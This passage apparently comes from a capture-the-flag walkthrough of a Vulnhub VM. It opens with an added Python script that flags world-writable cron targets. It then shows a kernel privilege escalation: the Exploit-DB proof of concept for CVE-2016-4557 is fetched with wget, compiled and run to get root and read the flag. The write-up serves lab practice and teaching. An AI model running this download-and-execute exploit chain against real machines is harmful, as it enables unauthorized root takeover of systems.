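Linux Priv Checker's world-writable list is long and unsorted. As an added example (my code, not the post's and not linuxprivchecker's), here is a Python 3 check that does the specific thing that mattered here: it parses system-crontab entries and, for every absolute command path, reports whether the file itself is world-writable or sits in a world-writable directory without the sticky bit (which lets you replace the file even when its own mode is tight). It handles only the system-crontab layout (five time fields, a user, then the command) and @reboot-style lines; build_demo() creates a constructed crontab and two scripts in a temp directory so it runs without root, and scan_system_cron() runs the same check over the real /etc/crontab and /etc/cron.d.

```python
import os
import stat
import tempfile

SYSTEM_CRON_FILES = ("/etc/crontab",)
SYSTEM_CRON_DIRS = ("/etc/cron.d",)  # cron.{hourly,daily,...} hold scripts, not tables


def cron_commands(text: str) -> list:
    """First word of each command in a system crontab
    (min hour dom mon dow user command ...) or '@reboot user command'.
    Comments, blank lines and NAME=value lines are skipped."""
    cmds = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if "=" in fields[0]:          # SHELL=/bin/sh, PATH=..., MAILTO=...
            continue
        idx = 2 if fields[0].startswith("@") else 6
        if len(fields) > idx:
            cmds.append(fields[idx])
    return cmds


def _mode(path: str):
    try:
        return os.stat(path).st_mode
    except OSError:
        return None


def writable_finding(path: str):
    """Why an unprivileged user could change what runs at `path`, or None."""
    mode = _mode(path)
    if mode is None:
        return None                   # missing target: cron just logs an error
    if mode & stat.S_IWOTH:
        return "file is world-writable"
    parent = os.path.dirname(path) or "/"
    pmode = _mode(parent)
    if pmode and pmode & stat.S_IWOTH and not pmode & stat.S_ISVTX:
        return "parent directory is world-writable without the sticky bit"
    return None


def writable_cron_targets(crontab_text: str) -> list:
    """(command, reason) for every absolute command that can be hijacked."""
    hits = []
    for cmd in dict.fromkeys(cron_commands(crontab_text)):  # dedupe, keep order
        if not os.path.isabs(cmd):
            continue                  # relative names depend on cron's PATH
        reason = writable_finding(cmd)
        if reason:
            hits.append((cmd, reason))
    return hits


def build_demo():
    """Constructed fixture: a temp dir with one 0755 and one 0777 script and a
    crontab text referencing both. Returns (text, bad_path, good_path)."""
    d = tempfile.mkdtemp(prefix="cron-demo-")
    good = os.path.join(d, "backup.sh")
    bad = os.path.join(d, "cron-logrotate.sh")
    for p, mode in ((good, 0o755), (bad, 0o777)):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, mode)
    text = (
        "SHELL=/bin/sh\n"
        "# m h dom mon dow user command\n"
        f"*/5 *   * * *   root {bad}\n"
        f"0   3   * * *   root {good} --rotate\n"
        "@reboot         root /nonexistent/firstboot.sh\n"
    )
    return text, bad, good


def scan_system_cron() -> list:
    """Run the check over the real system crontabs (readable ones only)."""
    paths = list(SYSTEM_CRON_FILES)
    for d in SYSTEM_CRON_DIRS:
        if os.path.isdir(d):
            paths += [os.path.join(d, n) for n in sorted(os.listdir(d))]
    hits = []
    for p in paths:
        try:
            with open(p) as f:
                hits += writable_cron_targets(f.read())
        except OSError:
            pass
    return hits


if __name__ == "__main__":
    text, bad, good = build_demo()
    print("demo:", writable_cron_targets(text))
    print("system:", scan_system_cron())
```

The sticky-bit check is what keeps /tmp out of the results: it is world-writable, but you cannot replace another user's file there.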
Privilege Escalation 3: Kernel Exploit
First, I get the kernel version:

JKanode@red: uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
Next, I find the matching exploit on Exploit-DB: Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD), CVE-2016-4557, at https://www.exploit-db.com/exploits/39772/. It is the Project Zero proof of concept, distributed as a tarball. I download it to the target, unpack it, compile it with the bundled script and run it. Two caveats: a kernel exploit can panic the box, so snapshot the VM and keep another way in before trying it, and it needs a compiler on the target, which this one has.
wget -O exploit.tar 'https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552'
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
root@red:/tmp/ebpf_mapfd_doubleput_exploit# cat /root/flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
[ASCII-art trophy omitted]
b6b545dc11b7a270f4bad23432190c75162c4a2b
I hope this helps everyone to crack this awesome VM.
Thanks to g0tmi1k for creating the VM, and most of all for hosting vulnhub.com so we have awesome VMs to practice on.